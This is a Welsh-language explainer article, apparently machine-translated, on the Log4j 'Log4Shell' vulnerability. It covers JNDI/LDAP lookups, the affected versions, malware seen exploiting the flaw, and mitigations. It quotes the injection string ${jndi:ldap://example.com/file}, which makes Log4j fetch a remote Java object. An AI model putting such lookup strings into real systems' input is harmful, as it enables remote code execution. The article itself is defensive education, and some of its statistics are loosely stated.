Tabl Cynnwys[Cuddio][Dangos]
Ddiwedd mis Tachwedd 2021, fe wnaethom ddarganfod bygythiad mawr i seiberddiogelwch. Gallai'r camfanteisio hwn effeithio ar filiynau o systemau cyfrifiadurol ledled y byd.
Dyma ganllaw ar fregusrwydd Log4j a sut y gadawodd diffyg dylunio a anwybyddwyd dros 90% o wasanaethau cyfrifiadurol y byd yn agored i ymosodiad.
Cyfleustodau logio ffynhonnell agored sy'n seiliedig ar Java yw Apache Log4j a ddatblygwyd gan Sefydliad Meddalwedd Apache. Ysgrifennwyd yn wreiddiol gan Ceki Gülcü yn 2001, ac mae bellach yn rhan o Apache Logio Services, prosiect gan Sefydliad Meddalwedd Apache.
Mae cwmnïau ledled y byd yn defnyddio llyfrgell Log4j i'w galluogi i fewngofnodi ar eu cymwysiadau. Mewn gwirionedd, mae llyfrgell Java mor hollbresennol, gallwch ddod o hyd iddi mewn cymwysiadau gan Amazon, Microsoft, Google, a mwy.
Mae amlygrwydd y llyfrgell yn golygu y gallai unrhyw ddiffyg posib yn y cod adael miliynau o gyfrifiaduron yn agored i gael eu hacio. Ar 24 Tachwedd 2021, a diogelwch cwmwl darganfu ymchwilydd yn gweithio i Alibaba ddiffyg ofnadwy.
Roedd bregusrwydd Log4j, a elwir hefyd yn Log4Shell, yn bodoli heb i neb sylwi ers 2013. Roedd y bregusrwydd yn caniatáu i actorion maleisus redeg cod ar systemau yr effeithiwyd arnynt sy'n rhedeg Log4j. Fe'i datgelwyd yn gyhoeddus ar 9 Rhagfyr, 2021
Mae arbenigwyr diwydiant yn galw'r diffyg Log4Shell y bregusrwydd mwyaf yn y cof diweddar.
Yn ystod yr wythnos yn dilyn cyhoeddi'r bregusrwydd, fe wnaeth timau seiberddiogelwch ganfod miliynau o ymosodiadau. Arsylwodd rhai ymchwilwyr gyfradd o dros gant o ymosodiadau y funud.
Sut mae'n gweithio?
Er mwyn deall pam mae Log4Shell mor beryglus, mae angen i ni ddeall yr hyn y mae'n gallu ei wneud.
Mae bregusrwydd Log4Shell yn caniatáu gweithredu cod mympwyol, sydd yn y bôn yn golygu y gall ymosodwr redeg unrhyw orchymyn neu god ar beiriant targed.
Sut mae'n cyflawni hyn?
Yn gyntaf, mae angen inni ddeall beth yw'r JNDI.
Mae Rhyngwyneb Enwi a Chyfeiriadur Java (JNDI) yn wasanaeth Java sy'n caniatáu i raglenni Java ddarganfod a chwilio am ddata ac adnoddau trwy enw. Mae'r gwasanaethau cyfeiriadur hyn yn bwysig oherwydd eu bod yn darparu set drefnus o gofnodion i ddatblygwyr gyfeirio atynt yn hawdd wrth greu cymwysiadau.
Gall y JNDI ddefnyddio protocolau amrywiol i gael mynediad at gyfeiriadur penodol. Un o'r protocolau hyn yw'r Protocol Mynediad Cyfeiriadur Ysgafn, neu LDAP.
Wrth logio llinyn, log4j yn perfformio amnewidiadau llinynnol pan fyddant yn dod ar draws mynegiadau o'r ffurf ${prefix:name}
.
Er enghraifft, Text: ${java:version}
efallai ei fod wedi mewngofnodi fel Testun: Java fersiwn 1.8.0_65. Mae'r mathau hyn o eilyddion yn gyffredin.
Gallwn hefyd gael ymadroddion megis Text: ${jndi:ldap://example.com/file}
sy'n defnyddio'r system JNDI i lwytho gwrthrych Java o URL trwy'r protocol LDAP.
Mae hyn i bob pwrpas yn llwytho'r data sy'n dod o'r URL hwnnw i'r peiriant. Gall unrhyw haciwr posibl gynnal cod maleisus ar URL cyhoeddus ac aros i beiriannau sy'n defnyddio Log4j ei logio.
Gan fod cynnwys negeseuon log yn cynnwys data a reolir gan ddefnyddwyr, gall hacwyr fewnosod eu cyfeiriadau JNDI eu hunain sy'n cyfeirio at weinyddion LDAP y maent yn eu rheoli. Gall y gweinyddion LDAP hyn fod yn llawn gwrthrychau Java maleisus y gall y JNDI eu gweithredu trwy'r bregusrwydd.
Yr hyn sy'n gwneud hyn yn waeth yw nad oes ots a yw'r rhaglen yn gais ar ochr y gweinydd neu'n gymhwysiad ochr y cleient.
Cyn belled â bod ffordd i'r cofnodwr ddarllen cod maleisus yr ymosodwr, mae'r cais yn dal i fod yn agored i gampau.
Pwy sy'n cael ei effeithio?
Mae'r bregusrwydd yn effeithio ar yr holl systemau a gwasanaethau sy'n defnyddio APache Log4j, gyda fersiynau 2.0 hyd at ac yn cynnwys 2.14.1.
Mae sawl arbenigwr diogelwch yn cynghori y gallai'r bregusrwydd effeithio ar nifer o gymwysiadau sy'n defnyddio Java.
Darganfuwyd y diffyg gyntaf yn y gêm fideo Minecraft sy'n eiddo i Microsoft. Mae Microsoft wedi annog eu defnyddwyr i uwchraddio eu meddalwedd Minecraft argraffiad Java i atal unrhyw risg.
Dywed Jen Easterly, Cyfarwyddwr yr Asiantaeth Cybersecurity and Infrastructure Security (CISA) fod gan werthwyr cyfrifoldeb mawr i atal defnyddwyr terfynol rhag actorion maleisus rhag ecsbloetio'r bregusrwydd hwn.
“Dylai gwerthwyr hefyd fod yn cyfathrebu â’u cwsmeriaid i sicrhau bod defnyddwyr terfynol yn gwybod bod eu cynnyrch yn cynnwys y bregusrwydd hwn a dylent flaenoriaethu diweddariadau meddalwedd.”
Dywedir bod yr ymosodiadau eisoes wedi dechrau. Mae Symantec, cwmni sy'n darparu meddalwedd seiberddiogelwch, wedi arsylwi nifer amrywiol o geisiadau ymosodiad.
Dyma rai enghreifftiau o'r mathau o ymosodiadau y mae ymchwilwyr wedi'u canfod:
- botnets
Rhwydwaith o gyfrifiaduron yw botnets sydd dan reolaeth un parti ymosod. Maent yn helpu i berfformio ymosodiadau DDoS, dwyn data, a sgamiau eraill. Arsylwodd ymchwilwyr botnet Muhstik mewn sgriptiau cregyn wedi'u llwytho i lawr o ecsbloetio Log4j.
- XMRig Miner Trojan
Glöwr arian cyfred digidol ffynhonnell agored yw XMRig sy'n defnyddio CPUs i gloddio tocyn Monero. Gall seiberdroseddwyr osod XMRig ar ddyfeisiau pobl fel y gallant ddefnyddio eu pŵer prosesu heb yn wybod iddynt.
- Khonsari Ransomware
Mae Ransomware yn cyfeirio at fath o ddrwgwedd sydd wedi'i gynllunio i amgryptio ffeiliau ar gyfrifiadur. Yna gall ymosodwyr fynnu taliad yn gyfnewid am roi mynediad yn ôl i'r ffeiliau wedi'u hamgryptio. Darganfu ymchwilwyr y ransomware Khonsari mewn ymosodiadau Log4Shell. Maent yn targedu gweinyddwyr Windows ac yn gwneud defnydd o'r fframwaith .NET.
Beth sy’n digwydd nesaf?
Mae arbenigwyr yn rhagweld y gallai gymryd misoedd neu hyd yn oed flynyddoedd i unioni'r anhrefn a achosir gan fregusrwydd Log4J yn llawn.
Mae'r broses hon yn cynnwys diweddaru pob system yr effeithir arni gyda fersiwn glytiog. Hyd yn oed os yw'r holl systemau hyn yn glytiog, mae'r bygythiad o hyd o ddrysau cefn posibl y gallai hacwyr fod wedi'u hychwanegu eisoes at y ffenestr yr oedd gweinyddwyr yn agored i ymosodiad arnynt.
Mae llawer o atebion a mesurau lliniaru bodoli i atal ceisiadau rhag cael eu hecsbloetio gan y byg hwn. Newidiodd y fersiwn Log4j 2.15.0-rc1 newydd amrywiol leoliadau i liniaru'r bregusrwydd hwn.
Bydd yr holl nodweddion sy'n defnyddio JNDI yn cael eu hanalluogi yn ddiofyn ac mae chwiliadau o bell wedi'u cyfyngu hefyd. Bydd analluogi'r nodwedd chwilio ar eich gosodiad Log4j yn helpu i leihau'r risg o orchestion posibl.
Y tu allan i Log4j, mae angen cynllun ehangach o hyd i atal camfanteisio ffynhonnell agored.
Yn gynharach ym mis Mai, rhyddhaodd y Tŷ Gwyn an gorchymyn gweithredol gyda'r nod o wella seiberddiogelwch cenedlaethol. Roedd yn cynnwys darpariaeth ar gyfer bil deunyddiau meddalwedd (SBOM) a oedd yn ei hanfod yn ddogfen ffurfiol a oedd yn cynnwys rhestr o bob eitem yr oedd ei hangen i adeiladu'r rhaglen.
Mae hyn yn cynnwys rhannau fel y ffynhonnell agored pecynnau, dibyniaethau, ac APIs a ddefnyddir ar gyfer datblygu. Er bod y syniad o SBOMs yn ddefnyddiol ar gyfer tryloywder, a fydd yn helpu'r defnyddiwr mewn gwirionedd?
Gall uwchraddio dibyniaethau fod yn ormod o drafferth. Gall cwmnïau ddewis talu unrhyw ddirwyon yn hytrach na mentro gwastraffu amser ychwanegol yn dod o hyd i becynnau amgen. Efallai na fydd y SBOMs hyn ond yn ddefnyddiol os yw eu cwmpas yn gyfyngedig ymhellach.
Casgliad
Mae mater Log4j yn fwy na phroblem dechnegol i sefydliadau yn unig.
Rhaid i arweinwyr busnes fod yn ymwybodol o risgiau posibl a allai ddigwydd pan fydd eu gweinyddwyr, eu cynhyrchion neu eu gwasanaethau yn dibynnu ar god nad ydyn nhw eu hunain yn ei gynnal.
Mae dibynnu ar geisiadau ffynhonnell agored a thrydydd parti bob amser yn dod â rhywfaint o risg. Dylai cwmnïau ystyried gweithio allan strategaethau lliniaru risg cyn i fygythiadau newydd ddod i'r amlwg.
Mae llawer o'r we yn dibynnu ar feddalwedd ffynhonnell agored a gynhelir gan filoedd o wirfoddolwyr ledled y byd.
Os ydym am gadw'r we yn lle diogel, dylai llywodraethau a chorfforaethau fuddsoddi mewn ariannu ymdrechion ffynhonnell agored ac asiantaethau seiberddiogelwch fel CISA.
Gadael ymateb